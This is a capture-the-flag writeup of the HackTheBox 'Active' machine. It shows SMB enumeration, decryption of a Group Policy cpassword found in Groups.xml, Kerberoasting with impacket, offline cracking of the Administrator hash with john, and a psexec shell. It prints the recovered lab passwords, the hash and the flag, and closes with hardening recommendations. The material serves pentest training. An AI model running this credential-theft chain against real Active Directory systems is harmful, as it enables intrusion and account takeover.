blog/content/writeup-ctf/writeup-active-htb/index.md

---
title: "Writeup - Active (HTB)"
date: 2022-03-25
slug: "writeup-active-htb"
type: "writeup-ctf"
--- 

This is a writeup for the [Active](https://app.hackthebox.com/machines/Active) machine from the HackTheBox site.

## Enumeration

First, let's start with a scan of our target with the following command:


```bash
nmap -sV -T4 -Pn 10.10.10.100
```
Many TCP ports are discovered:

![](img/image-1.webp)

## Exploit

First of all, let's make an enumeration of the users/shares with the following command:


```bash
enum4linux -a 10.10.10.100
```
![](img/image-2.webp)

You can find a certain amount of information, but above all, a share is available for reading as an anonymous person. Let's see what we can find inside. To connect I use the following command:


```bash
smbclient --no-pass //10.10.10.100/Replication
```
In the share there are two folders, one of which is of particular interest to me: `Policies`. In this folder I find the file `Groups.xml` which contains information allowing the exploitation of the machine.

[Exploiting GPP SYSVOL (Groups.xml) | VK9 Security](https://vk9-sec.com/exploiting-gpp-sysvol-groups-xml/)

![](img/image-3.webp)

And indeed in the file I find 2 important information: `name` and `cpassword`.


```bash
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
```
As explained in the article above it is possible to decrypt the `cpassword` with the `gpp-decrypt` command.

![](img/image-4.webp)

We can therefore deduce the following credencials:

user : active.htb\SVC\_TGS  
pass : GPPstillStandingStrong2k18

I now look at the permissions I have with these credentials:

![](img/image-5.webp)

I now have access to the share `Users`, let's see what's inside:

![](img/image-6.webp)

I quickly find the first flag on the desktop of the SVC-TGS user:

![](img/image-7.webp)

## Privilege escalation

To realize the elevation of privilege and since I have the credential of a user, I will do a Kerberoasting.


> Kerberoasting is a post-exploitation attack that extracts service account credential hashes from Active Directory for offline cracking. [complx.com](https://www.qomplx.com/qomplx-knowledge-kerberoasting-attacks-explained/#:~:text=Kerberoasting%20is%20a%20post%2Dexploitation,poor%20service%20account%20password%20hygiene.)

To perform the hashes extraction I will use the following command:


```bash
impacket-GetUserSPNs active.htb/SVC_TGS -dc-ip 10.10.10.100 -outputfile output.txt -request
```
![](img/image-8.webp)


```bash
┌──(d3vyce㉿kali)-[~]
└─$ cat output.txt 
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$b8d16f6a494a6a06a7954e6a89f01ae1$2c1fc9a4a13479b7c31b2f76a8d6e9b05d97f7c6557848ad2d87960e7c89104568eb3f0ec8eedb7ab3636cca2209ed5b1582c14da207c6dab05f8ef6fce1047075d6d5edf2386f87e85576d90c9cfbac94044dceab2a4dc70c2751b7d353927781444a3e852b0bd795ca6975fb95c55fa8a49787bcb4ab0e02beee3edcb9df5d5fe53600aa0d0da1b22aae42649eedfff67ee00a2464a3fcbdef110cbf8eadce8f715fe620b5580154442099ad3771ec32c585c72a9e2f7d58d43f7344844d3b17a3cbc4b3c143af7d86343c51d945edc429fce49ee91c90dce2cad6bd4f17f6d210ce8055f49d69cee83aeca19f43cf465c6ab4b1d9c7bc575ef95a43aa235aa8adda00f65db41895396cf4727a05b367e779d126a06ca0d3319e6ff06cc127bf95d833ee54158ce905a1fd0e3b4de2e20e31a336fd6d5f0bf2b67660ddfc22106773a069f63c4d5ffa7c0178123a68b0b63a937df8783e2fd581f61539958aea7493035b8dbabfbf2775e70fd67440df8f9bc07d47d172d87ad717c8a27e752317e4d21ce2a3f403bfa6e6574ab10895d4d4cecb4f4feb1e1c718ce7b9c338a5ca5749374af941665174ff4246aed685b3d095b45f916accaf0a17656b4115d62d60dbb684eecec1235ea79645b12d957897c55c0f21c650ca9cc257bfaaa9ffef0b60edf265f9456a0db411e40e6b4ece00e6a143b40a5de5c833e5cb9708040e0f56b341bdc2ddc2ea1acf38b966d0583a027709c744a03fa600d9d943b3d7ffe9de5f591ac5ad7cd6158a918b99d6b15155099428a441f2984e6f82d2bbb1e5dc16c77ef6cc3604275e93d76d63fe2465331146c8358cf1a95413c502bd02a070c1caad48287720364005117067d5b04a4dc4ae3220443c400a4f4083b9110cb20783e5bf3412dcfbaff12e82f282b7749c412a4d52513814da147f0a40ad058f49c0216e980436af8455f6b1cecd4e6ace6877baf640fb8fadb3e92177343581aa96fbab2901b9226407273ab8568c1a2c7600493b741b809f817aa18d521f5cda1571461b67159a46272f51160f5790fa919019b8facbb70777f948654d895284992c0db9da7b87df843324fc43165c63d504f78b770f2612b9c88c598bc1dbd80d593f738d965b5593cd25fc41a53e1bf9f8095e99ef84aeac8c7426ba36af8aa036dac6440cb2412d5c0c7b626630931f0aee1b0dd469bc94f17f5ebed590bed26c6865916d0213d9f411723b4efb09f3f0d5043036
```
Bingo, the command finds the hash of the administrator of the machine, now we can perform a dictionary attack locally using john. To do this I use the following command:


```bash
john output.txt --wordlist=Documents/wordlist/rockyou.txt
```
![](img/image-9.webp)

After a few seconds, John gives me the password for the administrator account: `Ticketmaster1968`.

I can verify that the credentials work well with `smbmap` :

![](img/image-10.webp)

Then I can create a reverse shell with `psexec`:

![](img/image-11.webp)

I now have a shell as `NT authority` authority and I can get the last flag.


```bash
C:\Users\Administrator\Desktop> more root.txt
7255a7f4f435814c28a5e8b51aabb4b4
```
## Recommendations

To patch this host I think it would be necessary to perform a number of actions:

- Do not leave the `Policies` file accessible to everyone
- Disable SMB anonymous access
- Use a strong password for the administrator account